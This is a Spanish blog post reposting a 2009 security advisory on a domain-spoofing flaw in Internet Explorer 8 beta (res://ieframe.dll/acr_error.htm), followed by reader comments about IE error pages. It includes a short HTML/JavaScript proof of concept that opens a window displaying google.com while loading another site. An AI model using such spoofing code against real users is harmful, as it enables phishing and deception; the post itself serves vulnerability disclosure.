IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoofing

###########################################

IE8 beta RC1 res: / / Ieframe.dll / acr_error.htm Spoff
Vendedor: http://www.microsoft.com
Avisado por: http://lostmon.blogspot.com/2009/03/ie8-beta-c1-resieframedllacrerrorhtm.html
Notificado al vendedor: Disponibilidad del exploit:

############################################

Internet Explorer 8 tiene una vulnerabilidad que permite a los usuarios remotos spoofear el nombre del dominio en ‘Ieframe.dll‘ que se establece en el archivo ‘acr_error.htm‘ en res: URI es desde donde maneja cualquier usuario remoto pudiendo así crear una URL maligna que muestra el nombre de dominio, por ejemplo, “google.com“, (pero si clickamos en la url de google nos lleva a otros sítios, es lo llamado spoofing)

#################

Prueba del concepto

#################

<html>

<head>

<script type=”text/javascript”>

function open_win()

{

window.open(“res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com”,”_blank”,”toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no”);

}

</script>

</head>

<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>

<body>

<form>

<input type=”button” value=”Open Window” onclick=”open_win()”>

</form>

</body>

</html>

#######################################

Thnx To estrella to be my ligth

Thnx to all Lostmon Team.

atentamente:

Lostmon (lostmon@gmail.com)

—————

thz Lost 😉

Anuncios

12 Responses to “IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoofing”


  1. 1 RONNY marzo 31, 2009 en 2:40 pm

    Brother pero seria bueno que dijeras como se puede reparar esta vulnerabilidad ya que me tiene al borde de la locura, es algo tan tedioso, te agradezco me colabores.

    Saludos

  2. 2 KAT mayo 18, 2009 en 1:15 pm

    lo mismo digo, pero a mi se me complica con delicious, me empezo a suceder desde q lo instale y es mas cuando una pagina me da este error se abre la busqueda de delicious, estoy pensando desinstalarlo mmm

  3. 3 jmontero junio 18, 2009 en 2:01 pm

    Asi es, a mi tambie me tiene loco, tengo 4 dias tratando de repararlo…. 😦

  4. 4 Pimenta noviembre 20, 2009 en 12:02 pm

    Hi, I speaking from Brazil, and I have the same problem, but when I star internet explorer withour complements, the problem thus not exist more, I tried many things desable some complements but didn’t have success.
    Please help me.
    Thanks
    Friends,
    In the page that it was doing I withdrew the addresses of email what were joined to send through message, in other words, when this number of emails was big it was giving the problem. Now it is not giving any more, in spite of is not certain what is only that.
    Thank you.

  5. 5 Shura mayo 15, 2010 en 3:53 pm

    miren ami me tiene loco hace 4 dias q bengo renegando ese error hasta me cierra el explorer de una y el mozzila unica solucion desctivar todo lo q inicia en windows pero solo soluciono el mozzila totalmente y el explorer se repite el error infinitamente haciendo inmenzo la lina de la paguina repitiendo :
    res://ieframe.dll/acr_error.htm#google.com.ar,http://www.google.com.ar/

    alguien tiene una idea de como solucionar bien el problema?????

  6. 6 Monse mayo 17, 2010 en 4:53 pm

    a mi tambien me pasa eso!!! alguna forma de repararlo??? tengo windows 7, y por mas que kiera volver a descargarlo no se puede!!!

  7. 7 txonan mayo 26, 2010 en 11:25 am

    mirar tengo un acer aspire 5738zg 500gb hdd windows 7 intel pentium, ati radeon hd 4570 graphics 512 mb.
    soy un chabal de 11 años y me pasa lo mismo que a bosotros.
    ahi dos tipos de internet explorer 32 bits y 64 bits ami el problema ese me pasa con el 32 bits y oi e intentado con el 64 bits i me ba como nunca!.no creo que os sirba para nada pero adios!

  8. 8 Gelu mayo 31, 2010 en 10:54 pm

    A mí me pasaba lo mismo pero seguí las instrucciones de esta página y no y he vuelto a tener ningún problema con el IE. También tengo Windows 7.
    La página en cuestión es http://www.myantispyware.com/2009/12/02/how-to-remove-sshnas-dll-trojan-remove-trojan-fakealert/
    Espero que les funcione.

  9. 9 adderly septiembre 2, 2010 en 3:05 am

    hola a todos ejecuten el google como administrador hasta que solucionen el problema con eso se repara momentaneamente bye ….tengo el mismo problema si lo soluciono por completo les aviso ok

  10. 10 quique noviembre 9, 2010 en 9:30 pm

    como solución provisional, me he creado otro usuario de windows 7 y desde allí sí funciona el IE

  11. 11 Edissound marzo 16, 2011 en 2:23 am

    Lamentablemente en mi pc, no funciono, esto paso al instalar un servidor ftp. Pude recuperar firefox, pero el IE no. Además esto paso en mi perfil personal y pasar al perfil de administrador tengo el mismo error. A ver si alguíen mas nos puede ayudar.

  12. 12 TeCnoLabS junio 27, 2011 en 6:46 am

    yo oprimo F5 para quitar la compativilidad ed la web y me funciona el sitio que quiero visitar


Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s




Blog Stats

  • 612,047 visitas

RSS

Feed
marzo 2009
L M X J V S D
« Feb   Abr »
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker

A %d blogueros les gusta esto: